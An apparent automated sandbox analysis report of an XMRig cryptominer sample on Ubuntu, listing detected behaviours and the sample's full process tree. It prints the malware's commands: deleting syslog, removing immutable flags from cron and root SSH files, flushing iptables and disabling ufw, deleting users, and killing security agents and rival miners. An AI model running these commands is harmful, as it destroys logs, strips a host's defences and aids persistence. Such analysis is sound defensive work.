max time kernel
4s -
max time network
140s -
ubuntu-18.04_amd64 -
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
20-08-2024 08:26
Static task
Behavioral task
Behavioral task
Behavioral task
Behavioral task
Malware Config
XMRig is a high performance, open source, cross platform CPU/GPU miner.
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Flushes firewall rules 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
ufwiptablespid process 1522 ufw 1694 iptables 3064 -
modprobeioc pid process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1526 modprobe -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
iptablesxargsiptablesxargsxargsxargschattrip6tablesip6tablesxargsxargsxargsip6tablesxargsxargsxargsxargsiptablesxargsxargsxargsip6tablesxargsxargsiptablesxargsxargsip6tablesxargsip6tablesxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsip6tablesip6tablesxargspid process 1555 iptables 2554 xargs 2559 2659 2631 2715 1567 iptables 1743 xargs 2154 xargs 2412 xargs 2627 1518 chattr 1651 ip6tables 1653 ip6tables 2997 2269 xargs 2377 xargs 2389 xargs 2661 1655 ip6tables 1776 xargs 2149 xargs 2460 xargs 2490 xargs 2985 1572 iptables 1731 xargs 1758 xargs 2039 xargs 2691 1622 ip6tables 1737 xargs 2133 xargs 2989 1599 iptables 2196 xargs 2515 xargs 3060 1616 ip6tables 2550 xargs 2590 1680 ip6tables 2044 xargs 2601 2709 1573 iptables 2171 xargs 2485 xargs 2703 1908 xargs 1994 xargs 2665 2713 3021 2671 1843 xargs 1954 xargs 2510 xargs 2535 xargs 2625 1621 ip6tables 1624 ip6tables 2226 xargs 2619 -
Creates/modifies Cron job 1 TTPs 41 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc process File opened for modification /var/spool/cron/crontabs/tmp.Qucbzf File opened for modification /var/spool/cron/crontabs/tmp.08ajMi File opened for modification /var/spool/cron/crontabs/tmp.hug3Kh File opened for modification /var/spool/cron/crontabs/tmp.766ssi File opened for modification /var/spool/cron/crontabs/tmp.xHV0Ij File opened for modification /var/spool/cron/crontabs/tmp.uHOK3j File opened for modification /var/spool/cron/crontabs/tmp.11XdHc File opened for modification /var/spool/cron/crontabs/tmp.H50wIe File opened for modification /var/spool/cron/crontabs/tmp.B3PPaf File opened for modification /var/spool/cron/crontabs/tmp.pIQNYh File opened for modification /var/spool/cron/crontabs/tmp.EFNOvk File opened for modification /var/spool/cron/crontabs/tmp.jolUXj File opened for modification /var/spool/cron/crontabs/tmp.1bVC1n File opened for modification /var/spool/cron/crontabs/tmp.9sf4G9 File opened for modification /var/spool/cron/crontabs/tmp.8dGklc File opened for modification /var/spool/cron/crontabs/tmp.62QQhg File opened for modification /var/spool/cron/crontabs/tmp.lyJSbj File opened for modification /var/spool/cron/crontabs/tmp.abyLQh File opened for modification /var/spool/cron/crontabs/tmp.ok5X8g File opened for modification /var/spool/cron/crontabs/tmp.8CGAQj File opened for modification /var/spool/cron/crontabs/tmp.yY7qla File opened for modification /var/spool/cron/crontabs/tmp.OaPvOd File opened for modification /var/spool/cron/crontabs/tmp.hZa9Uc File opened for modification /var/spool/cron/crontabs/tmp.XSFOqk File opened for modification /var/spool/cron/crontabs/tmp.LN2eie File opened for modification /var/spool/cron/crontabs/tmp.rsV3Gg File opened for modification /var/spool/cron/crontabs/tmp.0T23Ne File opened for modification /var/spool/cron/crontabs/tmp.4eLvfj File opened for modification /var/spool/cron/crontabs/tmp.W7akyi File opened for modification /var/spool/cron/crontabs/tmp.rJ3xwh File opened for modification /var/spool/cron/crontabs/tmp.GOKrBh File opened for modification /var/spool/cron/crontabs/tmp.giP8dl File opened for modification /var/spool/cron/crontabs/tmp.U9tUVd File opened for modification /var/spool/cron/crontabs/tmp.uLOlLd File opened for modification /var/spool/cron/crontabs/tmp.IeGJ2c File opened for modification /var/spool/cron/crontabs/tmp.QUiXEl File opened for modification /var/spool/cron/crontabs/tmp.PuisQk File opened for modification /var/spool/cron/crontabs/tmp.h1cL8c File opened for modification /var/spool/cron/crontabs/tmp.9ekKgl File opened for modification /var/spool/cron/crontabs/tmp.PCXnMl File opened for modification /var/spool/cron/crontabs/tmp.kB3mJk -
Disables AppArmor 28 IoCs
Disables AppArmor security module.
pid process 3068 3043 3063 3069 3069 3043 3063 3068 3069 3069 3068 3080 3043 3043 3063 3063 3068 3068 3069 3043 3059 3063 3063 3078 3088 3043 3068 3069 -
Disables SELinux 1 IoCs
Disables SELinux security module.
pid process 3042 -
Enumerates running processes
Discovers information about currently running processes on the system
Changes its process name 1 IoCs
description ioc pid Changes the process name, possibly in an attempt to hide itself (sysv-install) 3060 -
Reads CPU attributes 1 TTPs 64 IoCs
killpspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
modprobedescription ioc process File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspkillpspspspspspspsdescription ioc process File opened for reading /proc/211/status ps File opened for reading /proc/1141/cmdline ps File opened for reading /proc/323/cmdline ps File opened for reading /proc/183/cmdline File opened for reading /proc/1511/cmdline File opened for reading /proc/1516/status ps File opened for reading /proc/1178/status ps File opened for reading /proc/10/cmdline ps File opened for reading /proc/685/status File opened for reading /proc/177/stat File opened for reading /proc/1297/cmdline File opened for reading /proc/467/status File opened for reading /proc/1486/status File opened for reading /proc/993/status File opened for reading /proc/660/stat ps File opened for reading /proc/495/status ps File opened for reading /proc/1116/status ps File opened for reading /proc/211/stat ps File opened for reading /proc/29/status File opened for reading /proc/7/cmdline File opened for reading /proc/1107/cmdline File opened for reading /proc/1187/cmdline ps File opened for reading /proc/1069/status ps File opened for reading /proc/8/status ps File opened for reading /proc/685/status File opened for reading /proc/1162/cmdline File opened for reading /proc/21/cmdline ps File opened for reading /proc/1042/cmdline ps File opened for reading /proc/36/cmdline ps File opened for reading /proc/974/status ps File opened for reading /proc/1143/cmdline ps File opened for reading /proc/28/stat ps File opened for reading /proc/167/stat ps File opened for reading /proc/178/stat ps File opened for reading /proc/137/stat ps File opened for reading /proc/18/status File opened for reading /proc/181/status File opened for reading /proc/1036/status File opened for reading /proc/1235/status ps File opened for reading /proc/1151/cmdline File opened for reading /proc/172/stat ps File opened for reading /proc/1182/cmdline ps File opened for reading /proc/26/status File opened for reading /proc/uptime ps File opened for reading /proc/1183/status ps File opened for reading /proc/1182/cmdline ps File opened for reading /proc/80/stat ps File opened for reading /proc/2138/stat ps File opened for reading /proc/715/stat ps File opened for reading /proc/495/status ps File opened for reading /proc/1184/cmdline File opened for reading /proc/465/status pkill File opened for reading /proc/589/stat ps File opened for reading /proc/446/cmdline ps File opened for reading /proc/34/status File opened for reading /proc/1137/cmdline File opened for reading /proc/211/cmdline ps File opened for reading /proc/692/status ps File opened for reading /proc/531/cmdline File opened for reading /proc/993/status ps File opened for reading /proc/175/cmdline ps File opened for reading /proc/1083/status ps File opened for reading /proc/177/cmdline ps File opened for reading /proc/179/status ps -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118description ioc process File opened for modification /tmp/log_rot ae82d283c9d196bcc0b7b8539f40d6e8_JaffaCakes118
- Writes file to tmp directory
PID:1516 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1517 -
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
PID:1518 -
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:1519
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵PID:1520
/usr/bin/chattrchattr -i /etc/crontab2⤵PID:1521
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1522 -
/sbin/iptables/sbin/iptables -V3⤵PID:1523
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1524
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1525
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1526 -
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1530
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1533
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1534
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1535
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1536
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1537
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1538
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1539
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1540
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1541
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1542
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1543
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1544
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1545
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1546
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1547
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1548
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1549
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1550
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1551
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1552
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1553
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1554
/sbin/iptablesiptables -F ufw-track-input4⤵
- Attempts to change immutable files
PID:1555 -
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1556
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1557
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1558
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1559
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1560
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1561
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1562
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1563
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1564
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1565
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1566
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1567 -
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1568
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1569
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1570
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1571
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:1572 -
/sbin/iptablesiptables -Z ufw-after-input4⤵
- Attempts to change immutable files
PID:1573 -
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1574
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1575
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1576
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1577
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1578
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1579
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1580
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1581
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1582
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1583
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1584
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1585
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1586
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1587
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1588
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1589
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1590
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1591
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1592
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1593
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1594
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1595
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1596
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1597
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1598
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1599 -
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1600
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1601
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1602
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1603
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1604
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1605
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1606
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1607
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1608
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1609
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1610
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1611
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1612
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1613
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1614
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1615
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1616 -
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1617
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1618
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1619
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1620
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1621 -
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Attempts to change immutable files
PID:1622 -
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1623
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
- Attempts to change immutable files
PID:1624 -
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1625
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1626
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1627
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1628
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1629
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1630
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1631
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1632
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1633
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1634
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1635
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1636
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1637
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1638
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1639
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1640
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1641
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1642
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1643
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1644
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1645
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1646
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1647
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1648
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1649
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1650
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1651 -
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1652
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1653 -
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1654
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
- Attempts to change immutable files
PID:1655 -
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1656
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1657
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1658
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1659
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1660
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1661
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1662
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1663
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1664
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1665
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1666
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1667
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1668
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1669
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1670
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1671
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1672
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1673
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1674
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1675
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1676
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1677
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1678
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1679
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1680 -
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1681
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1682
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1683
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1684
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1685
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1686
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1687
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1688
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1689
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1690
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1691
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1692
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1693
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1694 -
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵PID:1695
/usr/sbin/userdeluserdel akay2⤵PID:1699
/usr/sbin/userdeluserdel vfinder2⤵PID:1700
/usr/bin/chattrchattr -iae /root/.ssh/2⤵PID:1707
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵PID:1708
/bin/rmrm -rf "/tmp/addres*"2⤵PID:1709
/bin/rmrm -rf "/tmp/walle*"2⤵PID:1710
/bin/rmrm -rf /tmp/keys2⤵PID:1711
/bin/grepgrep -i "[a]liyun"2⤵PID:1713
/bin/psps aux2⤵PID:1712
/bin/grepgrep -i "[y]unjing"2⤵PID:1715
/bin/psps aux2⤵PID:1714
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1720
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1719
/usr/bin/awkawk "{print \$7}"2⤵PID:1718
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1725
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1724
/usr/bin/awkawk "{print \$7}"2⤵PID:1723
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1731 -
/bin/grepgrep -v -2⤵PID:1730
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1729
/usr/bin/awkawk "{print \$7}"2⤵PID:1728
/bin/grepgrep :1432⤵PID:1727
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1737 -
/bin/grepgrep -v -2⤵PID:1736
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1735
/usr/bin/awkawk "{print \$7}"2⤵PID:1734
/bin/grepgrep :22222⤵PID:1733
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1743 -
/bin/grepgrep -v -2⤵PID:1742
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1741
/usr/bin/awkawk "{print \$7}"2⤵PID:1740
/bin/grepgrep :33332⤵PID:1739
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1749
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1747
/bin/grepgrep -v -2⤵PID:1748
/usr/bin/awkawk "{print \$7}"2⤵PID:1746
/bin/grepgrep :33892⤵PID:1745
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1758 -
/bin/grepgrep -v -2⤵PID:1757
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1756
/usr/bin/awkawk "{print \$7}"2⤵PID:1755
/bin/grepgrep :44442⤵PID:1754
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1764
/bin/grepgrep -v -2⤵PID:1763
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1762
/usr/bin/awkawk "{print \$7}"2⤵PID:1761
/bin/grepgrep :55552⤵PID:1760
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1770
/bin/grepgrep -v -2⤵PID:1769
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1768
/usr/bin/awkawk "{print \$7}"2⤵PID:1767
/bin/grepgrep :66662⤵PID:1766
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1776 -
/bin/grepgrep -v -2⤵PID:1775
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1774
/usr/bin/awkawk "{print \$7}"2⤵PID:1773
/bin/grepgrep :66652⤵PID:1772
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1782
/bin/grepgrep -v -2⤵PID:1781
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1780
/usr/bin/awkawk "{print \$7}"2⤵PID:1779
/bin/grepgrep :66672⤵PID:1778
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1788
/bin/grepgrep -v -2⤵PID:1787
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1786
/usr/bin/awkawk "{print \$7}"2⤵PID:1785
/bin/grepgrep :77772⤵PID:1784
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1794
/bin/grepgrep -v -2⤵PID:1793
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1792
/usr/bin/awkawk "{print \$7}"2⤵PID:1791
/bin/grepgrep :84442⤵PID:1790
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1800
/bin/grepgrep -v -2⤵PID:1799
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1798
/usr/bin/awkawk "{print \$7}"2⤵PID:1797
/bin/grepgrep :33472⤵PID:1796
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1806
/bin/grepgrep -v -2⤵PID:1805
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1804
/usr/bin/awkawk "{print \$7}"2⤵PID:1803
/bin/grepgrep :144442⤵PID:1802
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1812
/bin/grepgrep -v -2⤵PID:1811
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1810
/usr/bin/awkawk "{print \$7}"2⤵PID:1809
/bin/grepgrep :144332⤵PID:1808
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1818
/bin/grepgrep -v -2⤵PID:1817
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1816
/usr/bin/awkawk "{print \$7}"2⤵PID:1815
/bin/grepgrep :135312⤵PID:1814
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1820
/bin/catcat /tmp/.X11-unix/012⤵PID:1819
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1822
/bin/catcat /tmp/.X11-unix/112⤵PID:1821
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1824
/bin/catcat /tmp/.X11-unix/222⤵PID:1823
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1826
/bin/catcat /tmp/.pg_stat.02⤵PID:1825
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1828
/bin/catcat /tmp/.pg_stat.12⤵PID:1827
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1830
/bin/catcat /data/./oka.pid2⤵PID:1829
/usr/bin/pkillpkill -f zsvc2⤵PID:1831
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads runtime system information
PID:1832 -
/usr/bin/pkillpkill -f updatecheckerd2⤵PID:1833
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1838
